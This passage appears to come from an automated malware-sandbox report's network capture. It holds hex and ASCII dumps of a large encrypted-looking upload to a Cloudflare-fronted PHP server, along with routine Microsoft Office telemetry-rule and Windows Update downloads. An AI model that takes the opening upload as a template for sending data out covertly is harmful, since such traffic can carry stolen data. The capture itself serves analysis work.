1d 95 9c 8f c7 74 69 24 df 2d d1 cd 37 07 3a 14 f5 94 f0 89 Data Ascii: vak}76k4]62(=Uwr>$.1WpN)0_a^ATqH)q/tE4acZ-`X 8oF[$xp;J&f\|HHH"2,q\|FQyD:vPQ}=/rh+sJg+.*zrti$-7:
2024-11-24 02:04:22 UTC	15331	OUT	Data Raw: 05 b8 86 56 47 e7 e4 c7 ad 5c 84 fe 77 dc 22 af cc fa 88 c7 bf bd b5 fe 6d 73 e9 e7 2e c0 5b 6d 02 90 b0 00 f3 ce 3d ee c5 01 8b d9 54 46 91 e8 70 d6 05 b3 17 f5 80 5a 92 44 ad 16 03 37 76 da e5 d4 7b 79 35 f0 8c c9 0e 5d 0c 78 de 29 26 9f 53 3d cd 71 7b d2 5c 7c 84 73 e3 7b ac 14 bc 97 75 20 35 46 02 e0 3b 70 0c 1c 01 df 8d 82 65 b7 be 68 7f 69 e1 65 3a d3 88 e8 72 67 8b 4b 16 28 58 37 b6 53 b8 25 4f f3 18 b0 b4 c8 6e a8 57 59 0b 49 6e 41 12 cb 51 aa 3d 6e 48 2d 65 a5 3e aa 3a 4b 55 5e e8 fe a2 0b 82 54 c9 01 5b 12 e0 c3 ba 99 a0 a1 cc d4 ab 62 be 3c cc 62 e6 f1 e8 8d 53 6f b0 57 86 1a d0 ba 5b f4 90 fe 1e 93 fc 73 25 9a 49 70 84 14 e8 6d c0 03 62 3e 40 89 57 1f a0 2b d1 94 92 4d 14 6f 6a 33 f7 46 19 09 82 55 7b b7 7a 3b 24 4b 70 8b 42 6c 30 36 0f df b1 Data Ascii: VG\w"ms.[m=TFpZD7v{y5]x)&S=q{\\|s{u 5F;pehie:rgK(X7S%OnWYInAQ=nH-e>:KU^T[b<bSoW[s%Ipmb>@W+Moj3FU{z;$KpBl06
2024-11-24 02:04:26 UTC	1017	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pbn3bn2kducrch7n2vvqdjhcf7; expires=Wed, 19-Mar-2025 19:51:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OEak4oOvu4XrECa7q1g7xWHOnz8Z1U4aHg91gjsPJb7UH9v5hmNqd4Ujqle5uB9PSsCfK5iEStajBXBPXlAre1fDcbDuKun7R7jK5CbeJu7WmO71OLkB54nfZYLVl5eHEg%2Bueo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e75d3f41f120c7c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1684&sent=283&recv=597&lost=0&retrans=0&sent_bytes=2846&recv_bytes=572684&delivery_rate=1235194&cwnd=129&unsent_bytes=0&cid=88d51566e64c0a24&ts=3519&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:24 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:25 UTC	471	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:24 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Fri, 22 Nov 2024 01:49:48 GMT ETag: "0x8DD0A97F285E80B" x-ms-request-id: 91a9dc6d-001e-0028-4620-3dc49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020424Z-174c587ffdfldtt2hC1TEBwv9c00000003k000000000h1kc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-24 02:04:25 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-24 02:04:25 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-24 02:04:25 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-24 02:04:25 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-24 02:04:25 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-24 02:04:25 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-24 02:04:25 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-24 02:04:25 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-24 02:04:25 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-24 02:04:25 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:25 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O+PWlvUr11LBdsr&MD=VdRA74wY HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-24 02:04:25 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 303c652b-8d8f-4e76-b544-85bbdd88d274 MS-RequestId: b268ac13-42f4-4ef3-b969-54258d796ec6 MS-CV: /J0ld+apZEeNtubg.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 24 Nov 2024 02:04:24 GMT Connection: close Content-Length: 24490
2024-11-24 02:04:25 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-24 02:04:25 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:27 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:27 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: 05856cf7-f01e-0020-4060-3b956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020427Z-178bfbc474b9xljthC1NYCtw94000000057g0000000095gx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-24 02:04:27 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:27 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:28 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:27 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: 2aa1f1ad-b01e-003d-7c43-3cd32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020427Z-174c587ffdf8fcgwhC1TEBnn70000000040g000000002sbq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-24 02:04:28 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:27 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:28 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:27 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 6b6b0dda-801e-0083-096a-3cf0ae000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020427Z-174c587ffdfmrvb9hC1TEBtn3800000003p000000000ugen x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-24 02:04:28 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" 